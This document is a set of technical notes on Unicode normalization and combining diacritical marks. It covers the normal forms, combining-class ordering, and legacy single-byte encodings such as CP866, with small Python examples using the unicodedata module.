Combining diacritics:

* http://en.wikipedia.org/wiki/Unicode_equivalence
  * Canonically equivalent -> n + ◌̃ = ñ (same display, printing, meaning)
  * Compatible: ligatures ﬀ = ff (same in some apps - sorting, indexing)
  * Unicode normalization - replaces equivalent sequences.
  * There are some equivalent characters (angstrom = 00C5 and 212B)
  * Combining vs precomposed characters (ligatures, combining)
  * Typographical conventions: ① is compatible with 1
  * There are 4 normal forms to compare/search for strings:
    * Canonical (NF) / Compatibility (NFK) equivalence (chosen semantically, canonical = strict, compatibility = relaxed)
    * Composed/Decomposed - doesn't matter, just choose one.
  * Forms are in http://www.unicode.org/Public/UCD/latest/ucd/UnicodeData.txt (http://en.wikipedia.org/wiki/Character_property_(Unicode))
* http://unicode.org/reports/tr15/ - Normalization & Equivalence.
* http://www.icu-project.org/docs/papers/optimized_unicode_composition_and_decomposition.html
* Algorithms: http://www.unicode.org/versions/Unicode6.3.0/ch03.pdf
* TR15 Part 8: Legacy encodings - about how to convert from/to other encodings.
* There's a Node.js Unicode normalization library, 'unorm'.
* http://en.wikipedia.org/wiki/Combining_diacritical_mark
* If there are several combining codes, in canonical form they should be stable-sorted in order of combining class.
* There are `quick check` flags: http://unicode.org/faq/normalization.html
  * We can check before encoding/decoding that the char is in the needed form.
* There's also a complex combining algorithm for Korean Hangul Jamo, using 3 tables.
* Combining diacritical ranges: 0x300-0x36F, 0x591-0x5C7, 0x610-0x61A, 0x64B-0x065F, some others.
* Encodings containing them: 864, 874, 1046, 1129, 1133, 1161-1163, 1255, 1256, 1258, 8859-6, 8859-11, TCVN, MacThai (mostly TCVN, 1258, 1255)
* Even for single-byte encodings I need (when there are combining chars):
  * Composing when decoding.
  * Decomposing when encoding.
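
The equivalences listed above can be checked with a small sketch. It uses Python's standard `unicodedata` module rather than the 'unorm' library named in the notes, so it only illustrates the Unicode behaviour, not any iconv-lite code. The helper name `forms` is hypothetical, and `unicodedata.is_normalized` assumes Python 3.8 or later.

```python
import unicodedata

def forms(text):
    """Return the four normal forms of `text` as lists of hex code points.

    `forms` is a hypothetical helper for illustration only.
    """
    return {
        name: [f"{ord(ch):04X}" for ch in unicodedata.normalize(name, text)]
        for name in ("NFC", "NFD", "NFKC", "NFKD")
    }

# Canonical equivalence: n + combining tilde (U+0303) composes to ñ (U+00F1).
assert unicodedata.normalize("NFC", "n\u0303") == "\u00F1"
assert unicodedata.normalize("NFD", "\u00F1") == "n\u0303"

# The angstrom sign (U+212B) is canonically equivalent to Å (U+00C5).
assert unicodedata.normalize("NFC", "\u212B") == "\u00C5"

# Compatibility equivalence: the ff ligature (U+FB00) and ① (U+2460)
# survive NFC but are replaced under the NFK* forms.
assert unicodedata.normalize("NFC", "\uFB00") == "\uFB00"
assert unicodedata.normalize("NFKC", "\uFB00") == "ff"
assert unicodedata.normalize("NFKC", "\u2460") == "1"

# Canonical ordering: combining marks are stable-sorted by combining class.
# Acute (U+0301) has class 230, dot below (U+0323) has class 220.
assert unicodedata.combining("\u0301") == 230
assert unicodedata.combining("\u0323") == 220
assert unicodedata.normalize("NFD", "a\u0301\u0323") == "a\u0323\u0301"

# A check before converting: is the string already in the needed form?
assert not unicodedata.is_normalized("NFC", "n\u0303")
assert unicodedata.is_normalized("NFC", "\u00F1")
```

Calling `forms("\u00F1")` shows the composed/decomposed split directly: the NFC entry holds one code point, the NFD entry two.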

=================================================

SBCS fast algorithm fails (see http://www.icu-project.org/docs/papers/optimized_unicode_composition_and_decomposition.html as inspiration):

* If combined char is in encoding, then un-combined is also there:
  * CP866: Її
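
One reading of the CP866 entry is that it is a counterexample to the assumption above: the precomposed letters Ї and ї are in the code page, but the pieces of their canonical decomposition are not. The sketch below checks this with Python's built-in `cp866` codec, which is assumed here to match the CP866 table the notes refer to. The helper name `canonical_parts_encodable` is hypothetical.

```python
import unicodedata

def canonical_parts_encodable(ch, encoding):
    """For each code point of NFD(ch), report whether `encoding` can encode it.

    Hypothetical helper for illustration; returns (code point label, bool) pairs.
    """
    result = []
    for part in unicodedata.normalize("NFD", ch):
        try:
            part.encode(encoding)
            ok = True
        except UnicodeEncodeError:
            ok = False
        result.append((f"U+{ord(part):04X}", ok))
    return result

# The precomposed letters encode to single bytes in CP866.
print("Ї".encode("cp866"), "ї".encode("cp866"))

# Their decomposed parts (base letter + combining diaeresis U+0308) do not.
print(canonical_parts_encodable("Ї", "cp866"))
print(canonical_parts_encodable("ї", "cp866"))
```

Under that reading, a decoder for such an encoding cannot assume that every precomposed character it emits could also have arrived as base letter plus combining mark.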